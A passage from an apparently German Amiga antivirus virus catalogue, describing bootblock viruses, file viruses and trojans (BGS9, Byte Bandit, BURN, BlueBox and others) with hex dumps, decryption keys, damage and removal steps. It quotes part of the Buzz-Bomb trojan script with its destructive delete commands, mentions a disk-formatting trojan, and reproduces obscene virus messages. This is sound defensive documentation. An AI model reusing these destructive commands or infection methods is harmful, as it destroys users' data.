Juergeleit) gelinkt. Laenge dann: 7876 Bytes Namensbegruendung: im Speicher und im File ist zu lesen 02e86018 3e204245 53544941 4c204445 ..`.> BESTIAL DE 56415354 4154494f 4e203c20 243c0000 VASTATION < $<.. Anmerkungen: - Es duerfte sich um eine Anfaenger-Programmierung handeln. - Grundlage duerfte das XENO-Virus sein. - Die Decodier-Routine im XENO wurde "uebersehen". - Dafuer kommen jetzt 2 absolute JMP nach $Cxyz vor. Wer da keinen Speicher hat, sieht bei der naechsten Verwendung von dos-Open den GURU B. - Mit etwas Glueck und Absicht gelingt der Link-Vorgang. - Von 20 !!!!! gelinkten Files war KEIN File lauffaehig, das mehr als 5 Hunks hatte. GURU 3, 4 usw. - Die richtige Hunk-Behandlung bereitet Probleme. Mal werden $10 Bytes doppelt geschrieben, bei Hunkanzahl kleiner 3 oder es wird $3E9 verschluckt usw. Und dafuer hab ich 4 Stunden geopfert. - Meine Empfehlung: Leute spielt lieber mit dem Joystick !!! Speichererkennung mit VT : getestet 04.03.93 Fileausbau mit VT : getestet 08.03.93 (VT kann teilweise auch Files reparieren, die im gelinktem Zustand nicht mehr lauffaehig sind.) - BGS9 I (schiebt Orig.Prg. in devs) Bytes 2608 laueft mit KS2.04 !!!!! Anruf 12.05.91: Auf einem A500 ohne Festplatte verschiebt der BGS9 I bei fehlendem devs-Verz. das OrigPrg unsichtbar in das Hauptverzeichnis. KickMem, KickTag, KickCheckSum, OpenWindow PrgTeile verschluesselt mit eori.l #$1AF45869,(a0)+ unsichtbares File in devs: A0A0A0202020A0202020A0 am Ende des Prg.Files ist mit einem Monitor zu sehen: TTV1 beim 4.Reset Textausgabe ueber GraphikRoutine: schwarzer Hintergrund, weisse Schrift A COMPUTER VIRUS IS A DISEASE TERRORISM IS A TRANSGRESSION SOFTWARE PIRACY IS A CRIME THIS IS THE CURE BGS9 BUNDESGRENZSCHUTZ SEKTION 9 SONDERKOMMANDO "EDV" Entfernung: File in devs in OriginalPrg. umbenennen BGSVirusFile loeschen OrigPrg aus devs in entsprechendes Verzeichnis kopieren Hinweis: es wird ein unsichtbares File (Name s.o.) weiterge- geben mit der Laenge #64 und dem Inhalt "Protection file!". Dieses File soll einen BGS9-Befall der Disk verhindern. Clone: 04.03.92 TTV1 durch FUCK ersetzt - BGS9 II aehnlich BGS9 I aber File in devs jetzt: A0E0A0202020A0202020A0 Hinweis: $E0 ist ein a mit Akzent Anruf 12.05.91: Auf einem A500 ohne Festplatte verschiebt der BGS9 II bei fehlendem devs-Verz. das OrigPrg in das Hauptverzeichnis. Aenderung im Text: :SOFTWARE' Die Veraenderungen liegen im codierten PrgBereich Im PrgFile TTV1 sichtbar - BGS9 III s.o. Neu: unsichtbarer Filename: devs:A0,0 Entfernung: File in devs in OriginalPrg. umbenennen BGSVirusFile loeschen OrigPrg aus devs in entsprechendes Verzeichnis kopieren - BigBenBB.-Virus Bootblock Name uebernommen. Im BB nicht nachvollziehbar KS40.063: Ja Verbogene Vektoren: Cool, DoIo, ReplyMes, WaitPort, ExecInt5 Schreibt immer DOS0-BB Versucht bei der Anzeige zu taeuschen Virus-BB: 444f5300 a16fe26a 00000370 4e716150 DOS..o.j...pNqaP ^^^^^^^^ Anzeige-BB: 444f5300 d14fe26d 00000370 43fa003e DOS..O.m...pC..> ^^^^^^^^ 4e716150 = NOP, bsr.s zu Cool schon verbogen Test 43fa003e = LEA Expansion Bei dem Anzeige-BB wuerde es sich also im einen normalen BB handeln. Der Virusteil im BB wuerde NIE erreicht, da ja der Sprungbefehl ersetzt wurde. Vermehrung: BB Die Vermehrung hat bei mir aufgehoert sobald die Zaehlzelle einen bestimmten Wert erreicht hatte. Verhalten: Es wird beim Booten die System-Uhrzeit (immer neu) ausgegeben. Das Bild steht dabei nicht, sondern scheint durchzulaufen. Dunkler Hintergrund, wechselnde Schriftfarbe (meist hell, nach GURU rot). Inhalt z.B.: 27/11/94 14:41:02 Nach mehreren Vermehrungen rattert bei mir DF0:, wenn eine nicht- schreibgeschuetzte Disk mit Virus-BB eingelegt wird. Wird diese Disk dann schreibgeschuetzt und erneut eingelegt, so erscheint die Uhrzeit. Hinweis: es ist bei Tests MEHRFACH vorgekommen, dass nicht der Virus-BB, sondern der Anzeige-BB geschrieben wurde. Der kann sich dann NICHT vermehren (s.o.). Um Verwirrungen zu vermeiden sollten Sie diesen ebenfalls durch einen sauberen BB ersetzen. Danke - BIG BOSS SCA-Clone nur Text geaendert s.u. - BIOMECHANIC-Trojan siehe bei IconD-Trojan - BLACK KNIGHT Virus BB im Speicher immer ab $7F300 Cool $7F394, DoIo $7F3BC KS2.04: ja Fordert trackdisk.device NICHT Namensbegruendung: decodiert ist im BB zu lesen BLACK KNIGHT (12/11/91) Virus meldet sich nicht. - BLACKFLASH V2.0 Cool, DoIo, FastMem ja im Speicher immer ab $7F000 Zaehlzelle = $13 Textausgabe mit Graphikroutine (s.u.) Schrift rot, Hintergrund schwarz Vermehrung: ueber BB Text steht unverschluesselt im BB: HELLO, I AM AMIGA ! PLEASE HELP ME ! I FEEL STICK ! I HAVE A VIRUS ! ! BY BLACKFLASH ! - BlackStar anderer Name: Starfire1/NorthStar1 siehe dort - Blade Runners SCA-Clone, immer ab 7EC00, Cool, im Prg. DoIo Text: Hello! We are the Blade Runners! u.s.w. - BLF-Virus immer ab $7F000, Cool, DoIo, BeginIo loescht KickTag usw. Virusprogramm meldet sich NICHT. Programmteil decodiert mit eori.b #$28,(a1)+ u.a. zu lesen: This is the new virus by BLF Schaden und Vermehrung: BB - Blieb6-BBS-Trojan Laenge: 7612 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Name von Filenamen (blieb6.exe) uebernommen. Gegen welches BBS-Prg. ist mir unbekannt. Vor ein gepacktes Original-File wurden einige Dos-Routinen ge- haengt. 00006468 303a6262 732f636f 6e666967 ..dh0:bbs/config 31006468 313a6262 732f636f 6e666967 1.dh1:bbs/config 3100223c 0000 1.. Nach diesen Files wird gesucht. Falls sie gefunden werden, wird ein GEAENDERTER Inhalt mit der Laenge #1972 Bytes zurueckge- schrieben. Im gepackten Teil koennen Sie nach dem Entpacken Lesen z.B.: 20426c69 65622056 352e3020 20282d3a Blieb V5.0 (-: 426c7565 20426f78 2050726f 3a2d2920 Blue Box Pro:-) 62792021 202d4d2d 442d442d 20212050 by ! -M-D-D- ! P Vielleicht hilft Ihnen das weiter. VT bietet nur Loeschen an. - BlowJob KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7f000 Taeuscht durch Text Memory Allocator 3.01 vor Vermehrung und Schaden: Bootblock Sobald die Zaehlzelle den Wert $7530 erreicht hat, wird ein Programmteil mit subi.b #$71,D0 entschluesselt und mit display- Alert der Text ausgegeben: ONCE AGAIN SOMETHING WONDERFULL HAPPENED (HE HE HE) PLEASE POWER OFF - PLEASE POWER OFF - PLEASE POWER OFF - BlueBox Filevirus, keine bekannten Vectoren werden verbogen Laenge (gecrunched) 5608, nur Kreset (tut mit leid) gedacht fuer Modembesitzer und Mailboxbetreiber, aber KEINE Voraussetzung fuer Vermehrung (enthaelt Source fuer seriellen Port $DFF030, $DFF018 ???!!!??? behindert Verbindung?!?!) Das gecrunchte Prg. (Bluebox) besteht aus 3 Teilen: - ein Taeuschprogramm: ermoeglicht Tonfolge mit Zehnertastatur - eine komplette icon.library - Laenge:6680 - zusaetzlicher Text: input.device , RAM: - andere Jahreszahl - ein Kopierteil fuer falsche icon.library - testet ob icon.library schon existiert, falls nein KEINE Aenderung - testet ob Disk validated - setzt Protection-Bits zurueck - kopiert falsche icon.library - arbeitet auch mit HD !!!!!! Nach einem Reset wird ueber icon.library ein Process 'input.device ' (mit Leerzeichen) gestartet. VT findet diesen Process, kann ihn aber nicht beenden (KReset). Erstellt auf RAM: ein unsichtbares ($A0) File (nicht immer). Ausbauhinweise: VT erkennt den VirusTraeger Bluebox nur als crunched !! Ignorieren Sie das Kreset-Angebot und loeschen Sie zuerst die falsche icon.library. Kopieren Sie dann die Original- icon.library auf die Disk oder HD (sonst nach Reset keine WB!!!). Zum Schluss starten Sie bitte das Kreset-Prg. Meine Maschine verhielt sich danach wieder normal. Dies kann bei Modemprg. oder MailboxPrg. anders sein ??? Probleme bitte melden. Danke Herkunft: Bluebox.lzh 23033 Bytes -Bluebox 5608 (noch einmal gecrunched) -Bluebox.info 325 -Bluebox.DOC 37271 -Bluebox.DOC.info 354 - bnuke15-Virus BBS-Bomb siehe unten bei scan.x - Bobble-Signum-Virus File siehe unten bei GENERALHUNTER - BOMB-Bootblock es wird dieser Bootblock als Virus weiterge- geben. Die Pruefsumme ist als BOMB lesbar. Es wird nachge- laden von einem hohen Track (habe nur BB). in diesem Track koennten natuerlich VirenRoutinen stehen, aber es kann genausogut ein BB-Lader sein. Bitte schicken Sie mir eine funktionsfaehige Disk mit diesem hohen Track. Danke Nachtrag Dez. 94: Es handelt sich um einen Introlader fuer ein Spiel. Dieser BB darf NICHT geloescht werden, sonst laeuft das Spiel NICHT mehr. AUCH der BB auf der Data-Disk darf NICHT veraendert werden. - boot-aids Virus BB KS2.04: nein Namensbegruendung: im BB ist uncodiert zu lesen: boot-aids by hiv verbogene Vektoren: BeginIo, KickTag, KickCheckSum, SumKick- Data Der Speicherbereich fuer das Virusteil wird mit $DFF007 be- stimmt. Schaeden: In Abhaengigkeit von $DFF006 soll ein Block mit HIV gefuellt werden. Vermehrung: BB Ihnen kommt das bekannt vor ? Erinnert irgendwie an Lamer ! Selbst die Endekennung $abcd ist vorhanden. Gewisse Schreibprobleme sollte man uebersehen im BB: guradians ^^ Clone: STARCOM 5 siehe unten - BootClock BB und File Loeschen Von der Absicht KEIN Virus A2000 ja A4000 keine Anzeige Dunkler Hintergrund, helle Schrift zeigt Datum und Uhr- zeit. Es gibt einen aktiven und inaktiven Bootblock erstell- bar mit +b oder -b . Der inaktive BB wird als DOS0-BB erkannt, da an $c nicht $4e716150 $43fa003e (=Original) steht. Klingt harmlos, ABER Cool, ExecVec5 und DoIo (nur im Prg) werden verbogen. OHNE Rueckfrage wird der BB geschrieben !!!! Das ist mir zu gefaehrlich, dass jemand einen Spielelader- BB gegen seinen Willen zerstoert. Dringende Empfehlung: Loeschen - BOOTJOB File FF 760 Laenge:1356 Namensbegruendung: s.u. 23c0003c ,y......N...#..< ^^^^ e3b4 237c ..C...N...C...#. ^^^^ 003ce3a4 ^^^^^^^^ 45442057 49544820 424f4f54 4a4f4220 ED WITH BOOTJOB 56312e30 30205752 49545445 4e204259 V1.00 WRITTEN BY Ein Utility-Prg. zum Abspeichern eines BBs als aus- fuehrbares File. Bei Filetest und BlockKette wird BootJob erkannt. Wenn Sie wissen wollen, um welchen BB es sich handelt, gehen Sie bitte in den File-Req., klicken das File an und klicken dann auf Filetest. Es werden 2 absolute Adressen verwendet (^^^). Was macht der User, der dort keinen Speicher hat ? Empfehlung: Loeschen - BOOTJOB V1.3 File FF 814 Laenge:1356 Fehler mit absoluten Adressen behoben. - BOOTX-Virus BB KickTag, KickCheckSum auch KS2.04 anderer Name: PERVERSE I Taeuschungsversuch durch lesbaren Text in BB: BOOTX-Viruskiller by P.Stuer verraet sich bei mir bei gesetztem Schreibschutz durch Systemrequest read/write error Vermehrung: BB Schaeden: faengt ueber input.device Tastatureingaben ab und gibt Text aus. Der Text steht als RAW-Code im BB (amerik.Tastatur !!) SOFTWARE_PIRATES RUINED MY EXCELLENT PROFESSIONAL DTP_PROGRAM I REVENGE MYSELF ON THESE IDIOTS BY PROGRAMMING VIRUSES THIS IS PERVERSE I BECAUSE I LIKE ASSHOLE_FUCKING I PROGRAM VIRUSES FOR MS_DOS TOO Eine Weiterarbeit ist NICHT moeglich. Das Virusprogramm muss geloescht werden. - BootXKiller-Virus BB Im Speicher immer ab $7FC00 Verbogene Vektoren: Cool, DoIo, OldOpenLib, WaitPort, DisplayAlert, SetMenuStrip KS 2.04: ja 68030: ja Fordert trackdisk.device nicht. Schreibt unabhaengig von der BB-Kennung (DOS0/1/2/3/4/5) IMMER DOS0. Folge: bei falscher Kennung kommt es zu Lese- oder Schreibfehler. Namensbegruendung: Im BB ist zu lesen: 20766972 7573202d 20426f6f 7458204b virus - BootX K 696c6c65 72000100 80164675 636b2074 iller.....Fuck t 6f20616c 6c202849 2964696f 74696320 o all (I)diotic Vermehrung: BB Meldung: (manchmal mit DisplayAlert) This is Virus - BootX Killer Fuck to all (I)diotic (B)ullshit (M)aschine users Send bug reports to: Mr. Larmer of Wanted Team Poland Schaeden: - Ersetzt Text in der Menue-Leiste von BootX durch BootXKiller. - Menue-Fenster enthaelt nur noch Quit - Verhindert bei BootX die Anzeige des BB.s Dafuer wird 2 Bloecke lang ausgegeben: BootXKiller BootXKiller BootXKiller usw. Wichtiger Hinweis: DisplayAlert und SetMenuStrip werden ueber OldOpenLib veraendert. Ablauf: Es wird geprueft ob intuition.library geoeffnet werden soll. Dann werden die zwei Vektoren verbogen. Aber !!!! Es wird dabei auf zwei Buchstaben "in" geprueft !!!!!! Also werden bei JEDER Library, die mit "in" beginnt, zwei Vektoren verbogen. Der GURU ist Ihnen dann sicher. - BRET HAWNES Filevirus Laenge: 2608 , immer ab $7F000 Kicktag, SumKickData, KickCheckSum, OpenNewLib, $6c Vermehrung und Schaden: schreibt in Root und in 1.Zeile startup: C0A0E0A0C0 nach 20 Minuten blauer Graphikbildschirm und weisse Schrift: GUESS WHO`S BACK ??? VEP. BRET HAWNES BLOPS YOUR SCREEN I`VE TAKEN THE CONTROLL OVER YOUR AMIGA!!! THERE`S ONLY ONE CURE: POWER OFF AND REBOOT ! ! ! ! ! Statt der 10. Vermehrung werden Tracks zerstoert. - Hinweis 01.08.93: Es ist ein Clone aufgetaucht, bei dem nur der lesbare Text (nicht der codierte) geaendert wurde. Wird weiterhin nur als Bret-Virus erkannt. KS2.04 : ja Laenge: 2600 also 8 Bytes kuerzer als Original, weil 03EC-Hunk entfernt wurde. Vermehrt sich das Teil, so ist die Laenge wieder 2608, da der 03EC-Hunk vom Virus angelegt wird. Am Fileanfang: 0000027D 60000018 53544152 4C494748 ...}`...STARLIGH 54203120 50524F44 55435449 4F4E2C79 T 1 PRODUCTION,y Am Fileende: F9526100 FED66000 FA02444F 20594F55 .DO YOU 204C494B 45204D59 20464952 53542056 LIKE MY FIRST V 49525553 203F2044 4F4E4520 4259204D IRUS ? DONE BY M 43444A2D 4444454E 49545921 20323130 CDJ-DDENITY! 210 32393000 00000000 000003F2 000003EB 290.... Wird vielleicht von anderen AntivirusPrg als Starlight - Virus erkannt. VT bleibt bei BRET HAWNES. - BS1! (noch ein SCA ) - BULGARIA Virus File BYTEPARASITE III - Clone s.u. - Bulletin-Trojan Zerstoerungsfile Trojan-Name von Filename uebernommen (wird wahrscheinlich als Demo weitergegeben) Laenge: 77740 Bytes KEINE verbogenen Vektoren Kann sich selbst NICHT vermehren. Mehrfach gepackt. Am Anfang wurde ein 3E8-Hunk (*Art) gelinkt, um die Packerer- kennung zu erschweren. Im File wird mit der 4EB9-4EF9-Methode gearbeitet. Im entpackten File ist zu lesen: 62726172 7900533a 00496e73 70656374 brary.S:.Inspect 6f722058 206f6620 412e4c2e 46ff0000 or X of A.L.F... Schaeden: In S: werden alle Files geoeffnet und veraendert. Shell-Startup vorher: ; $VER: Shell-Startup 40.1 (9.2.93) Prompt "%N.%S> " ;...... Shell-Startup nachher: Inspector X of A.L.Fp 40.1 (9.2.93) Prompt "%N.%S> " ;...... Es wird die Originallaenge zurueckgeschrieben. Auch Icons und ausfuehrbare Files werden veraendert. Eine Routine um das Schreibschutz-Bit zu veraendern, wurde NICHT gefunden. Eigentlich sollten noch mehr Unterverzeichnisse veraendert werden. Durch einen Programmierfehler ist das zum Glueck bei meinen Tests nicht gelungen. (2 Bytes verschoben) 62726172 79006262 733a0049 6e737065 brary.bbs:.Inspe 63746f72 2058206f 6620412e 4c2e4620 ctor X of A.L.F 2d20414c 69454e20 4c696645 20664f52 - ALiEN LifE fOR 4dff0000 00000000 00000000 00000000 M............... ;.... 62726172 7900433a 00496e73 70656374 brary.C:.Inspect ;.... 62726172 79004445 56533a00 496e7370 brary.DEVS:.Insp ;.... 62726172 79004c49 42533a00 496e7370 brary.LIBS:.Insp ;.... 62726172 79006262 733a6e6f 6465312f brary.bbs:node1/ ;.... 62726172 79005359 533a0049 6e737065 brary.SYS:.Inspe Der zu schreibende Text (ALieN..) waere also etwas laenger geworden. - BURN-Virus Typ 1 Link und Zerstoerung Keine staendig verbogenen Vektoren (manchmal Dos-Write) Lauffaehigkeit getestet: KS1.3, KS2.04, KS3.0 Verlaengert ein File um 2412 Bytes. Haengt 2 Hunks an. Einen Hunk zu Beginn des Original-Files und einen an das Ende (das ist neu !!!). Kann vorhandenen $3F1-Hunk am Anfang des Original-Files ueber- springen. Baut eigenen Process auf. Ein Name fuer den Process wird in der TaskWait-Liste gesucht. Damit nicht immer derselbe Processname Verwendung findet, wird die max. Laenge der Suchschleife mit - move.b $BFE801,d0 - festgelegt. Falls Sie also in VT/Listen/tasks ploetzlich z.B. 2x ramlib oder 3x Snoopdos ( im Test passiert ) finden, dann sollten bei Ihnen SOFORT die Alarmglocken klingeln. Diese Routine ist EBENFALLS NEU. VT versucht den Process im Speicher zu finden und bietet dann loeschen an (hoffe ich). Da ich nicht gerne Processe abschalte, (GURU-Gefahr), waere ein RESET auch nicht schlecht. Die Arbeit des Processes wird etwas gebremst durch ein DosDelay in Abhaengigkeit von - move.b $BFE601,d1 - . Enthaelt eine Datumsroutine: cmpi.l #$16f9,(a5) = 7.Feb.1994 Wenn dieses Datum ueberschritten ist, soll IMMER zerstoert werden. Ist dieses Datum noch nicht erreicht, so soll zuerst ein Link versucht werden. (DosLock, examine, exnext usw.). Wenn Link miss- lungen dann auch Zerstoerung. Ich habe mehrere Stunden auf verschiedenen Rechnern "geuebt". Es ist mir KEINE Vermehrung gelungen. Falls jemand mehr "Glueck" hat, bitte ich um Zusendung einiger Files. Danke !! Die Link-Routine kennt zuwenig Hunk-Typen. Falls eine Vermehrung wirklich gelingt, duerften haeufig NICHT LAUFFAEHIGE Programme entstehen. Ob VT diese Files durch Ausbau wieder in den Original- Zustand versetzen kann, kann ich nicht beurteilen, da mir die Vermehrung nicht gelungen ist. Zerstoerungsroutine: Der Rigid-Bereich wird erreicht, da die Zeile subq.w #2,d1 vorkommt. Die Laufwerke werden ueber DosEnv besorgt. (dosroot -> dosenv). Disketten mit 11 Sektoren duerften NICHT zerstoert werden (ble.b). BURN wird decodiert mit move.l #$5171c5c8,d1 eori.l #$13249786,d1 Ergebnis in den Sektoren auf meiner SyQuest: 0000: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN 0010: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN 0020: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN 0030: 4255524e 4255524e 4255524e 4255524e BURNBURNBURNBURN Da duerfte nicht viel zu retten sein. - BURN-Virus Typ 2 Link und Zerstoerung Verlaengert ein File um 2428 Bytes Die Vermehrungs-Routine arbeitet jetzt !!!!!!!! Mehrfachlinks an ein File sind moeglich, da eine "Schon-Ver- seucht"-Routine fehlt. Nach 8 Links an echo aufgehoert. Durch andi.b #$f,d0 wird nicht mehr ab 7.Feb.1994 immer zer- stoert, sondern es werden Tage ausgewaehlt. BURN wird nicht mehr geschrieben, sondern BAF00D0D (wenn ueber- haupt), weil Fehler: move.l #$baf00d0d,d1 addi.l #$87654541,d0 ^^ Ergebnis in den Sektoren bei mir: 0000: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0010: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0020: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0030: baf00d0d baf00d0d baf00d0d baf00d0d ................ 0040: baf00d0d baf00d0d baf00d0d baf00d0d ................ Restliches Verhalten siehe bei BURN Typ 1 . - BUTONIC 1.1 anderer Name BAHAN (im BB immer lesbar) Cool, im Prg. DoIo, immer ab $7ec00, FastMem ja Vermehrung: ueber BB wenn DOS0 gefunden Textausgabe mit PrintIText (entschluesselt mit eori.b #-1,d1 nach $7eb0c) im Speicher dann sichtbar: BUTONIC'S VIRUS 1.1 GREETINGS TO HACKMACK ... <GENERATION NR. #####> - Buzz-Bomb-MKI Loesch-Script-File Keine verbogenen Vektoren Namen: Skid_Row-SSII Laenge: 57449 Bytes Skid_Row-SSII.info Laenge: 950 Bytes Inhalt des ersten Files (gekuerzt): echo " " echo " Silent Service II " echo " " echo " Mega-Trainer " echo " " echo " by - SKID ROW " Echo " " ; ;.... von mir Teile geloescht ;Buzz Bomb MKI, on the Attack... Flying Straight outa Reallity Control ;Coded 9-12-91 by The Christening Man, if your reading this, Congrats... ;BBBBBBBBBBBBBBBBBBBBBBBBBBBBZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ;BBBBBBBBBBBBBBBBBBBBBBBBBBBBZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ;BBBBBBBBBBBBBBBBBBBBBBBBBBBBZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ Delete Sys:c/cd ;.....von mir geloescht..... echo "Working..." ;geloescht ..... Delete SYS:c/loadWb Delete SYS:c/Assign Delete SYS:s/Startupii Delete SYS:Libs/Mathieeedoubbas.library Delete SYS:Devs/mountlist Delete Sys:Devs/Serial.device Delete Sys:L/Newcon-handler Echo >sr "Wait 5" echo >>sr "Delete Skid_Row-SSII" ;You have reached the end you Stupid Fuck!!! run execute sr quit Durch das Icon wird IconX aufgerufen und das File abgearbeitet. Ueber echo wird zuerst ein Taeuschtext ausgegeben und dann mehrfach delete aufgerufen. Die Laenge von 57449 Bytes ergibt sich durch staendige Wiederholung der Zeilen ;Buzz .... ZZ . Weiterhin wird ein File mit dem Namen sr und Laenge 119 Bytes angelegt. Inhalt sr-File: 57616974 20350a44 656c6574 6520536b Wait 5.Delete Sk 69645f52 6f772d53 5349490a 3b42757a id_Row-SSII.;Buz 7a20426f 6d62204d 4b49202d 20627920 z Bomb MKI - by 54686520 43687269 7374656e 696e6720 The Christening 4d616e0a 3b502e53 2e20596f 7572202a Man.;P.S. Your * 20465543 4b494e47 204c414d 45202a20 FUCKING LAME * 2620536b 69642052 6f772c20 5355434b & Skid Row, SUCK 204d4521 21210a00 00000000 00000000 ME!!!.......... VT bietet Loeschen an. - BX-Updater-Bomb File Laenge: 2052 Keine verbogenen Vektoren. Namensbegruendung: es wird ein Fenster geoeffnet, das fol- genden Text in der Fensterleiste enthaelt: ff224e75 5241573a 302f302f 3634302f ."NuRAW:0/0/640/ 3230302f 426f6f74 582d5570 64617465 200/BootX-Update 72206279 20534849 20536166 65204865 r by SHI Safe He usw. Im Fenster selbst wird sinnloser Text ausgegeben, der den Ruf von SHI schaedigen soll. In Wirklichkeit wird ein format QUICK NOICONS ausgefuehrt. Betroffen: WORK, DH0: und DF0: Ein FehlerRequester soll durch das Prg. unterdrueckt werden. VT bietet loeschen an. - Byte Bandit ohne FastMem Begin, KickTag, KickCheckSum, Vec5 KS2.04: nein bei mir Guru 4 Im BB ist zu lesen: 56697275 73206279 20427974 65202020 Virus by Byte 42616e64 69742069 6e202039 2e38372e Bandit in 9.87. 4e756d62 6572206f 66202020 20202020 Number of 636f7079 73203a00 0000032d 48e77f7f copys :....-H. ;weit unten .... 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00646f73 2e6c6962 72617279 00000000 .dos.library.... - Byte Bandit 2 anderer Name: No Name 1 s.u. - Byte Bandit Clone ohne Fastmem Diff zu OrigByteBandit: 180 Bytes ( Byte B.. Text wurde aus BB entfernt !!) - ByteBanditError das OriginalByteBanditVirusPrg. beginnt im BB bei $0C, hier bei $32 Da die alte BB-Copy Routine verwendet wird, ist das 1.LW im neuen Copy-BB nicht DOS0, d.h. die neu verseuchte Disk ist "Not a DOS-Disk" also weder boot- noch vermehrungsfaehig - ByteBanditPlus Kick1.2 ohne FastMem Begin, KickTag, KickCheckSum, Vec5 Diff zu OBB: 92 Bytes (zusaetzlich trackdisk.... entfernt) - ByteParasite reines Zerstoerungsprogramm Laenge: 2108 soll auch $6c verbiegen, aber vorher GURU Schaeden: soll zwischen cd, dir und startup-sequence je 1 Byte austauschen, aber sehr sehr schlecht programmiert (Anfaenger spielt besser mit dem Joystick). Deshalb meist GURU. Keine Vermehrung, keine Textausgabe - BYTEPARASITE II File, Laenge ungepackt: 908 Bytes Auch mit KS2.04, keine Vektoren verbogen Taeuscht durch das Zeigen einer Fensterleiste: VirusX: Checking Device Df0: Versucht dann von df0:c VirusX nach df1:c zu kopieren und verraet sich so wenn in df1: keine Disk liegt durch einen Requester. Gefahr der Vermehrung besteht nur wenn BYTEPARASITE II als VirusX getarnt in df0:c vorhanden ist. Aus dem Text im File kann geschlossen werden, dass damit ein Antivirusprogrammierer geaergert werden soll: But now send me to : (Adresse) - BYTEPARASITE III File, Laenge ungepackt: 2160 Bytes Cool, KickMem, KickCheckSum (teilweise sinnlose Werte ausser- halb des vorhandenen Speichers) $6c (sinnvoller Wert) Das Programm MUSS !!!! im Speicher geloescht werden, sonst erscheint nach einigen Arbeiten mit dem Computer sicher Task held usw. . Dies ist nicht Absicht, sondern die sinnlosen Werte sind verantwortlich. Taeuscht durch das Zeigen einer Fensterleiste: Virus-Checker V3.0 by usw Sucht c/Virus-Checker und schreibt Prg-Teile (falls gefunden) absolut nach $7C000. Versucht in einem anderen LW mit SubDir c Virus-Checker anzulegen (bei mir IMMER dann Filelaenge 0). Verraet sich durch DOS-Requester. Hinweis: Hallo Enforcer-Freunde. VT erzeugt hier beim Test einen weiteren Enforcer-Hit. ($6c=ZeroPage) Nachtrag: Stand 14.02.92 Leider haben mich einige Briefe erreicht, die darauf hin- weisen, dass Hardwareschaeden (sinnlose Werte s.o.) durch BP3 verursacht werden. Stellvertretend ein Auszug: ".... musste ich feststellen, dass der Steppermotor sich am Spindel- ende zur Laufwerksmitte festgedreht hatte.... ... drehte die Spindel mit der Spitzzange zurueck... ... das Laufwerk/Schreib-Lesekopf muss neu justiert werden." Es ist also im Amiga-Bereich jetzt auch der Punkt erreicht, dass Viren Hardwareschaeden verursachen koennen. NIE !!!!! eine unbe- kannte Disk starten. Nehmen Sie sich die Zeit und testen Sie die Disk mit einem AntiVirusProgramm ihrer Wahl durch !!! - Clone aufgetaucht. Filename FCheck Laenge gepackt: 1368 Bytes Laenge ungepackt: 2160 Bytes Text geaendert. Der geistige Tiefflug geht soweit, dass nicht er- kannt wurde, dass cmpi.l #"-che",(a0) in cmpi.l #"_Che" ge- aendert werden muesste. Es ist halt bei der Selbsterkennungs- routine ein kleiner Unterschied zwischen - _ und c C . Das Teil stammt nie und nimmer aus Bulgarien. 62726172 7900632f 56697275 735f4368 brary.c/Virus_Ch 65636b65 7200632f 56697275 735f4368 ecker.c/Virus_Ch 65636b65 72004275 6c676172 69616e20 ecker.Bulgarian 416e7469 6c616d65 7220616e 64205669 Antilamer and Vi 72696861 636b6572 20262043 7261636b rihacker & Crack 65722047 6d624800 2042554c 47415249 er GmbH. BULGARI 41000056 69727573 5f436865 636b6572 A..Virus_Checker 2056362e 34206279 204a6f68 6e205665 V6.4 by John Ve 6c647468 75697320 20004368 65636b69 ldthuis .Checki 6e672044 46303a20 466f7220 56697275 ng DF0: For Viru - BYTE VOYAGER I Kicktag, KickCheckSum, im Prg. DoIo und $6c immer ab $7F000, verschluesselt mit $DFF006 Vermehrung und Schäden (auch HD !!): Bootblock und schreibt in Block 880 "Infected by BYTE VOYAGER !!!!!" Der Text ist bei Disks der neue Diskname. Clone: STARCOM 3 Virus siehe unten - Byte Voyager II Kicktag, KickCheckSum, im Prg. DoIo und $6c immer ab $7F000, verschluesselt mit $DFF006 Vermehrung und Schäden (auch HD !!): Bootblock und schreibt in Block 880 "Another Virus by Byte Voyager" Der Text ist bei Disks der neue Diskname. - Byte Warrior (DASA) (KickV1.2) DoIo, KickTag, KickCheckSum erster BB-Virus, der verschluesselt wurde moegliches Ursprungsprogramm: ByteWarriorCreater gepackt: 6012 Bytes (TNM) ungepackt: 7360 Bytes Erzeugt mit FastMem NDOS-Disk Schreibt ohne FastMem ByteWarrior in Bootblock von DF1: Clone: Paramount, MAD 3, MAD 3b - cALLERSLOG.SFX Laenge:8428 siehe bei COP-Trojan Typ G - CallingCard-Trojan gegen BBS File Loeschen Laenge: 11368 Bytes A4000: ja KEINE verbogenen Vektoren KEINE Vermehrung Im File ist zu lesen (uncodiert): 4e754d43 49204361 6c6c696e 67436172 NuMCI CallingCar 64204861 636b6572 20627920 42795465 d Hacker by ByTe 25732f46 696e6c61 6e6420ae 31393935 %s/Finland .1995 0a0a0000 3f005573 6167653a 20257320 ....?.Usage: %s Wenn Sie SnoopDos starten, muessen Sie leider feststellen, dass nach BBS:user.data gesucht wird. Dieser Textstring liegt aber codiert im File. Also hat da jemand etwas zu verbergen. - Cameleon-Virus BB siehe bei Little Sven - Cascade-Virus BB Im Speicher immer ab $7E000 Cool $7E060, DoIo $C0, Vec5 $E0 (also beide in der ZeroPage) Fordert trackdisk.device NICHT Namensbegruendung: Am Ende des BBs ist zu lesen: Cascade V2.1CCount : Vermehrung: als BB z.B. linke Maustaste nicht gedrueckt Es werden 1 oder 2 Bloecke mit DoIo geladen DOS0-Kennung wird gefunden. Test auf "SCA ", "Casc", "ID92" Schaeden: a) Schreibt von $c0 bis $FF in die ZeroPage. Dies ist unter KS1.3 unschaedlich, da dieser Bereich NICHT vom Betriebs- system genutzt wird. Ab KS2.04 liegen da aber Vektoren. Da das Virusteil den Bereich vor dem Ueberschreiben nicht rettet, kann es zu einem Guru kommen. Cascade_ZeroPage 00b0: 